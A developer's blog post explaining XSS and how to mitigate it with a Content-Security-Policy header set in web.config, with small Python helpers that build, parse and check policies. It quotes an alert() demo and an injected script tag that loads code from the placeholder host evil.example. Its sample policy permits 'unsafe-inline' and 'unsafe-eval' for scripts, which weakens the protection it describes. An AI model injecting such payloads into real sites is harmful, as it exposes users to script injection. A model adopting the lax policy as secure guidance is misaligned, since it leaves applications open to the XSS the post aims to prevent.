Prevent XSS Exploits - Content Security Policy Header

Ahh, XSS exploits. A nice buzzword at security conferences and classes. It sounds so cool and mysterious with the X in the front. But what is it really? How can it possibly harm my site and my users?

It is actually pretty simple when it comes down to it. A malicious user is able to inject JavaScript onto a site you are responsible for maintaining. And with the tools out there, it is pretty easy to basically take over a user's machine from there.

At most security trainings and conferences the expert will show you how to pop up an alert window using something like this:

  <script>alert('hello gov!');</script>

While neat to show, it appears fairly harmless. When a malicious user exploits XSS on your site, though, they are usually doing it to download a script file onto a user's machine. Most likely this is because most textboxes only allow users to enter, say, 50 characters. Not a whole lot can be done in 50 characters. Except download a file. What could that possibly do? Well, a fun tool to mess around with is the BeEF framework, which will give you a small taste of what is possible and some of the damage that can be done.
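To make the 50-character point concrete, here is a hypothetical injected payload (the domain evil.example is a placeholder, not a real attack host). All the attacker needs to fit in the field is a script tag that pulls a larger script from elsewhere:

```python
# A hypothetical XSS payload: a script tag that loads an external file.
# evil.example is a placeholder domain used for illustration only.
payload = '<script src=//evil.example/x.js></script>'

# The whole thing fits comfortably inside a 50-character textbox,
# yet it can pull in an arbitrarily large script once it executes.
print(len(payload), len(payload) <= 50)
```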

So what can we do to mitigate this problem?

Browsers have added functionality to help us help ourselves. That functionality has existed for years, we just haven't taken advantage of it.

One such feature can be activated by adding the "Content-Security-Policy" header to any responses coming from the UI. This creates a whitelist of acceptable sources. It also prevents inline styles and JavaScript from running. If your application needs those, don't worry: you can add the keyword 'unsafe-inline' to allow inline styles and JavaScript.
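The header value itself is just directives separated by semicolons, each followed by its allowed sources. As a rough sketch (the directive names are real CSP directives; the helper function and the sample sources are my own illustration), you can think of it as joining a map of directives:

```python
# Sketch: compose a Content-Security-Policy value from a directive map.
# The directive names are real; build_csp is an illustrative helper.
def build_csp(directives):
    """Join {directive: [sources]} into a single CSP header value."""
    return '; '.join(
        f"{name} {' '.join(sources)}" for name, sources in directives.items()
    )

policy = build_csp({
    'default-src': ["'none'"],
    'script-src': ["'self'", "'unsafe-inline'"],
    'style-src': ["'self'", "'unsafe-inline'"],
})
print(policy)
```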

It is easy to add it to your response headers via the web.config. Here is an example.

  <system.webServer>
    <httpProtocol>
      <customHeaders>
        <add name="Content-Security-Policy" value="default-src 'none';
                                                   script-src 'self' 'unsafe-inline' 'unsafe-eval';
                                                   style-src 'self' 'unsafe-inline';
                                                   connect-src 'self' 'unsafe-eval';
                                                   font-src 'self';
                                                   img-src 'self' *.mysite.com" />
        <add name="X-Content-Security-Policy" value="default-src 'none';
                                                     script-src 'self' 'unsafe-inline' 'unsafe-eval';
                                                     style-src 'self' 'unsafe-inline';
                                                     connect-src 'self' 'unsafe-eval';
                                                     font-src 'self';
                                                     img-src 'self' *.mysite.com" />
      </customHeaders>
    </httpProtocol>
  </system.webServer>

The duplicate header is because IE 11 requires an X- in front of it while Chrome does not. Fun!

What this is saying is:

  • Don't allow anything by default
  • Only allow scripts to be loaded from the current web site; 'unsafe-inline' and 'unsafe-eval' allow inline scripts and eval to execute
  • Only allow styles to be loaded from the current web site; 'unsafe-inline' allows inline CSS styles
  • Only allow connections to go back to the current web site
  • Only allow fonts to be loaded from the current web site
  • Only allow images to be loaded from the current web site and anything in the *.mysite.com domain. In the case of the company I work for, this was needed for employee pictures.
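Reading the header the other way around can also help. Here is a simplified sketch of splitting a policy value back into its directives so you can see exactly what each one grants (real CSP parsing handles more edge cases; the sample policy string mirrors the config above):

```python
# Sketch: split a CSP header value into {directive: [sources]}.
# Simplified on purpose; browsers handle many more edge cases.
def parse_csp(value):
    policy = {}
    for part in value.split(';'):
        tokens = part.split()
        if tokens:
            policy[tokens[0]] = tokens[1:]
    return policy

policy = parse_csp(
    "default-src 'none'; script-src 'self' 'unsafe-inline'; "
    "img-src 'self' *.mysite.com"
)
print(policy['img-src'])
```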

Basically, any HTML tag where you can specify a src file can have a whitelist set up. That list includes, but is not limited to:

  • JavaScript files
  • CSS Files
  • Images

I prefer denying everything by default and then adding in exceptions. The number of acceptable sources is far smaller than the number of bad sources. This has the added bonus of surfacing extra dependencies you might not even be aware of.

After adding the headers to the application my team and I are responsible for, it was interesting to see the fallout. And by interesting I mean annoying, because stuff that used to work suddenly stopped working.

  • Visual Studio Browser Link stopped working, so that needed to be whitelisted
  • The web application connected to other services hosted by my company that I did not know about, so those needed to be whitelisted
  • It required a fair amount of regression testing to ensure nothing else was broken. Hopefully that is all automated. Let QA know this change is happening so they have an expectation their test runs might start failing until you tweak the whitelist.

What I am trying to say is this is not something that should just be slapped in. But it adds a good amount of security. If a malicious user is able to get XSS into your application, the browser will not attempt to download the file unless it is on your approved list.
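That blocking decision boils down to checking the script's host against the whitelist. The toy function below (not the browser's real algorithm, just an illustration of the idea) treats 'self' as the page's own origin and lets *.mysite.com match subdomains:

```python
# Toy illustration of a script-src whitelist check. Not the real
# browser algorithm; 'self' and wildcard handling are simplified.
from urllib.parse import urlparse

def allowed(script_url, page_origin, sources):
    host = urlparse(script_url).hostname or ''
    origin_host = urlparse(page_origin).hostname or ''
    for src in sources:
        if src == "'self'" and host == origin_host:
            return True
        if src.startswith('*.') and host.endswith(src[1:]):
            return True
        if src == host:
            return True
    return False

sources = ["'self'", '*.mysite.com']
print(allowed('https://evil.example/x.js', 'https://app.mysite.com', sources))
print(allowed('https://img.mysite.com/a.js', 'https://app.mysite.com', sources))
```

The first call is refused because evil.example matches nothing on the list; the second succeeds via the *.mysite.com wildcard.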

The best approach would be to do this as early in your application's life as possible. In the case of the application my team and I are responsible for we added it about a year or so into the life of the application, which caused the need for regression testing. But in the end it was all worth it to make the site more secure.

About Bob Walker
Omaha, NE
Founder of CodeAperture.io. Principal Software Architect in Omaha, Nebraska. Friend of Redgate. Working as a Full Stack Developer since 2004.